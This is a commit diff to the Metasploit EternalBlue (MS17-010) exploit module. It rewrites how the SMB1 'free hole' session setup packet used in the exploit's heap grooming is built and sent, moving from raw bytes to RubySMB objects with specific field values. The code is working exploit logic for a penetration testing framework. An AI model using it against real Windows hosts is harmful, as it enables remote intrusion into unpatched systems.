update SMB1 "Freehole" packet

the 'Freehole' packet is now generated with
RubySMB and sent by the client, rather than raw bytes
sent over the bare socket

Author: David Maloney

modules/exploits/windows/smb/ms17_010_eternalblue.rb

@@ -358,13 +358,8 @@ def smb1_free_hole(start)
       pkt = make_smb1_free_hole_session_packet("\x07\x40", "\x2c\x01", "\xf8\x87\x00\x00\x00")
     end
 
-    #dump_packet(pkt)
-    sock.put(pkt)
-
-    vprint_status("Receiving free hole response.")
-    sock.get_once
-
-    return sock
+    client.send_recv(pkt)
+    sock
   end
 
   def smb1_get_response(sock)
@@ -575,44 +570,21 @@ def make_smb1_nt_trans_packet(tree_id, user_id)
   end
 
   def make_smb1_free_hole_session_packet(flags2, vcnum, native_os)
-    pkt = ""
-    pkt << "\x00"                   # Session message
-    pkt << "\x00\x00\x51"           # length
-    pkt << "\xffSMB"                # SMB1
-    pkt << "\x73"                   # Session Setup AndX
-    pkt << "\x00\x00\x00\x00"       # NT SUCCESS
-    pkt << "\x18"                   # Flags
-    pkt << flags2                   # Flags2
-    pkt << "\x00\x00"               # PID High
-    pkt << "\x00\x00\x00\x00"       # Signature1
-    pkt << "\x00\x00\x00\x00"       # Signature2
-    pkt << "\x00\x00"               # Reserved
-    pkt << "\x00\x00"               # TreeID
-    pkt << "\xff\xfe"               # PID
-    pkt << "\x00\x00"               # UserID
-    pkt << "\x40\x00"               # MultiplexID
-    #pkt << "\x00\x00"               # Reserved
+    packet = RubySMB::SMB1::Packet::SessionSetupRequest.new
 
-    pkt << "\x0c"                   # Word Count
-    pkt << "\xff"                   # No further commands
-    pkt << "\x00"                   # Reserved
-    pkt << "\x00\x00"               # AndXOffset
-    pkt << "\x04\x11"               # Max Buffer
-    pkt << "\x0a\x00"               # Max Mpx Count
-    pkt << vcnum                    # VC Number
-    pkt << "\x00\x00\x00\x00"       # Session key
-    pkt << "\x00\x00"               # Security blob length
-    pkt << "\x00\x00\x00\x00"       # Reserved
-    pkt << "\x00\x00\x00\x80"       # Capabilities
-    pkt << "\x16\x00"               # Byte count
-    #pkt << "\xf0"                   # Security Blob: <MISSING>
-    #pkt << "\xff\x00\x00\x00"       # Native OS
-    #pkt << "\x00\x00"               # Native LAN manager
-    #pkt << "\x00\x00"               # Primary domain
-    pkt << native_os
-    pkt << "\x00" * 17              # Extra byte params
+    packet.smb_header.flags.read("\x18")
+    packet.smb_header.flags2.read(flags2)
+    packet.smb_header.pid_high = 65279
+    packet.smb_header.mid      = 64
 
-    pkt
+    packet.parameter_block.vc_number.read(vcnum)
+    packet.parameter_block.max_buffer_size      = 4356
+    packet.parameter_block.max_mpx_count        = 10
+    packet.parameter_block.security_blob_length = 0
+
+    packet.data_block.native_os       = native_os
+    packet.data_block.native_lan_man  = "\x00" * 17
+    packet
   end
 
   # ring3 = user mode encoded payload